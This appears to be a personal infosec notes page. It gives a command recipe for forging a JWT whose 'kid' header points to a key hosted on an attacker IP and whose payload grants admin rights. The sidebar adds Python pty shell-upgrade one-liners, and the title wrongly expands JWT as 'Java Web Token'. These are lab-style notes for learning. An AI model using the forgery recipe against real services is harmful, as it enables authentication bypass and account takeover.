akde/infosec

Information security is ultimately about managing risk

JWT Java Web Token

,
  • Use https://jwt.io/ to decode JWT
    • It also shows the var­i­ous parts. A JWT token has mul­ti­ple parts in base64, sep­a­rat­ed by a point character.

Create JWT token

Cre­ate PEM SSH key:

openssl genrsa -out private.pem 2048

Cre­ate base64 from head­er and payload:

$ echo -n '{"typ":"JWT","alg":"RS256","kid":"http://10.10.14.17/private.pem"}' | base64 -w0 | sed s/+/-/ | sed -E s/=+$//
=> $header
$ echo -n '{"username":"aaa","email":"a@a.a","admin_cap":1}' | base64 -w0 | sed s/+/-/ | sed -E s/=+$//
=> $payload

Cre­ate sig­na­ture with the cre­at­ed pri­vate key:

echo -n "$header.$payload" | openssl dgst -sha256 -binary -sign private.pem | openssl enc -base64 | tr -d '\n=' | tr -- '+/' '-_'
=> $sig

Now, com­bine all parts to the JWT token:

$header.$payload.$sig

You can ver­i­fy this JWT token e.g. via https://jwt.io/.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';